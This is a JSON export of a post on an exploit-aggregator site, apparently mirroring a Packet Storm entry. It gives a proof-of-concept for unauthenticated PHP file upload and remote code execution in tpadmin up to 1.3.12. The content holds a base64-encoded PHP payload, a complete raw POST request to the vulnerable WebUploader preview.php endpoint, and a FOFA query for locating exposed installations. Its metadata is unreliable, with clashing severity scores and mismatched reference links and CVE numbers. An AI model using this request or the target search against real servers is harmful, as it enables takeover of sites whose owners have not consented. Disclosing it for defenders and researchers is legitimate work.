{"id":40110,"date":"2026-02-10T13:49:52","date_gmt":"2026-02-10T13:49:52","guid":{"rendered":"http:\/\/localhost\/?p=40110"},"modified":"2026-02-10T13:49:52","modified_gmt":"2026-02-10T13:49:52","slug":"yuan1994-tpadmin-shell-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40110","title":{"rendered":"\ud83d\udcc4 yuan1994 tpadmin Shell Upload_PACKETSTORM:215265"},"content":{"rendered":"

{“lastseen”:”2026-02-10T19:00:07″,”description”:”yuan1994 tpadmin versions up to 1.3.12 suffers from a remote shell upload vulnerability…”,”published”:”2026-02-10T00:00:00″,”modified”:”2026-02-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 yuan1994 tpadmin Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215265″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-2113″,”CVE-2026-23760″],”sourceData”:”# tpadmin-CVE-2026-2113-poc\\n \\n A proof-of-concept exploiting a Remote Code Execution with web server privileges via Arbitrary File Upload.\\n \\n # Vulnerability Description\\n \\n A critical Remote Code Execution vulnerability exists in H-ui.admin system’s WebUploader preview component. The `\\u003cfont style=\\”color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);\\”\\u003e\/public\/static\/admin\/lib\/webuploader\/0.1.5\/server\/preview.php\\u003c\/font\\u003e` file lacks proper authentication and file validation, allowing unauthenticated attackers to upload arbitrary PHP files directly to the web server. This results in immediate Remote Code Execution with web server privileges.\\n \\n # Affected Versions\\n \\n – tpadmin up to version 1.3.12\\n \\n # Poc (by sTy1H)\\n \\n 1. Construct payload (Encode the dangerous statement in base64)\\n “`bash\\n printf \\”\\u003c? php phpinfo();?\\u003e\\” | base64\\n PD9waHAgcGhwaW5mbygpOz8+\\n “`\\n \\n 2. Construct the POST request with our payload\\n “`html\\n POST \/admin\/lib\/webuploader\/0.1.5\/server\/preview.php HTTP\/1.1\\n Host: 127.0.0.1\\n User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko\/20100101 Firefox\/123.0\\n Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\\n Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\n Accept-Encoding: gzip, deflate, br\\n Connection: keep-alive\\n Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n\\n Upgrade-Insecure-Requests: 1\\n Content-Type: application\/x-www-form-urlencoded\\n Content-Length: 46\\n \\n data:image\/php;base64,PD9waHAgcGhwaW5mbygpOz8+\\n “`\\n 3. Visit the returned url\\n \\n \\u003cimg width=\\”800\\” height=\\”600\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/beaa331e-0553-4b71-b4bc-a38dcbd759e5\\” \/\\u003e\\n \\n # Into the wild\\n \\n FOFA:\\n \\n “`\\n title=’Tpadmin’\\n “`\\n \\n # Impact\\n \\n An unauthenticated remote attacker can exploit an Arbitrary File Upload to gain an RCE with web server privileges.\\n \\n CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:L\/VI:L\/VA:L\/SC:N\/SI:N\/SA:N\/E:P – 6.9:Medium\\n \\n # Remediation \\u0026 Mitigation\\n \\n There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.\\n \\n # References\\n \\n – https:\/\/github.com\/yuan1994\/tpAdmin\\n – [https:\/\/www.smartertools.com\/smartermail\/release-notes\/current](https:\/\/www.cve.org\/CVERecord?id=CVE-2026-2113))\\n – [https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-23760](https:\/\/github.com\/sTy1H\/CVE-Report\/blob\/main\/Remote%20Code%20Execution%20Vulnerability%20in%20Tpadmin%20System.md)”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215265″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:L\/A:L\/E:P\/RC:R”,”baseScore”:7.3,”baseSeverity”:”HIGH”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”NONE”,”scope”:”UNCHANGED”,”confidentialityImpact”:”LOW”,”integrityImpact”:”LOW”,”availabilityImpact”:”LOW”}},”href”:”https:\/\/packetstorm.news\/files\/id\/215265\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-10T19:00:07″,”description”:”yuan1994 tpadmin versions up to 1.3.12 suffers from a remote shell upload vulnerability…”,”published”:”2026-02-10T00:00:00″,”modified”:”2026-02-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 yuan1994 tpadmin Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215265″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-2113″,”CVE-2026-23760″],”sourceData”:”# tpadmin-CVE-2026-2113-poc\\n \\n A proof-of-concept exploiting a Remote Code…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-40110","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 yuan1994 tpadmin Shell Upload_PACKETSTORM:215265 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40110\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 yuan1994 tpadmin Shell Upload_PACKETSTORM:215265 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-10T19:00:07″,”description”:”yuan1994 tpadmin versions up to 1.3.12 suffers from a remote shell upload vulnerability…”,”published”:”2026-02-10T00:00:00″,”modified”:”2026-02-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 yuan1994 tpadmin Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215265″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-2113″,”CVE-2026-23760″],”sourceData”:”# tpadmin-CVE-2026-2113-pocn n A proof-of-concept exploiting a Remote Code...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40110\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-10T13:49:52+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40110#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40110\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 yuan1994 tpadmin Shell Upload_PACKETSTORM:215265\",\"datePublished\":\"2026-02-10T13:49:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40110\"},\"wordCount\":574,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40110#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40110\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40110\",\"name\":\"\ud83d\udcc4 yuan1994 tpadmin Shell Upload_PACKETSTORM:215265 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-10T13:49:52+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40110#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40110\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40110#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 yuan1994 tpadmin Shell Upload_PACKETSTORM:215265\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 yuan1994 tpadmin Shell Upload_PACKETSTORM:215265 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40110","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 yuan1994 tpadmin Shell Upload_PACKETSTORM:215265 - zero redgem","og_description":"{“lastseen”:”2026-02-10T19:00:07″,”description”:”yuan1994 tpadmin versions up to 1.3.12 suffers from a remote shell upload vulnerability…”,”published”:”2026-02-10T00:00:00″,”modified”:”2026-02-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 yuan1994 tpadmin Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215265″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-2113″,”CVE-2026-23760″],”sourceData”:”# tpadmin-CVE-2026-2113-pocn n A proof-of-concept exploiting a Remote Code...","og_url":"https:\/\/zero.redgem.net\/?p=40110","og_site_name":"zero redgem","article_published_time":"2026-02-10T13:49:52+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40110#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40110"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 yuan1994 tpadmin Shell Upload_PACKETSTORM:215265","datePublished":"2026-02-10T13:49:52+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40110"},"wordCount":574,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40110#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40110","url":"https:\/\/zero.redgem.net\/?p=40110","name":"\ud83d\udcc4 yuan1994 tpadmin Shell Upload_PACKETSTORM:215265 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-10T13:49:52+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40110#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40110"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40110#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 yuan1994 tpadmin Shell Upload_PACKETSTORM:215265"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40110"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40110\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}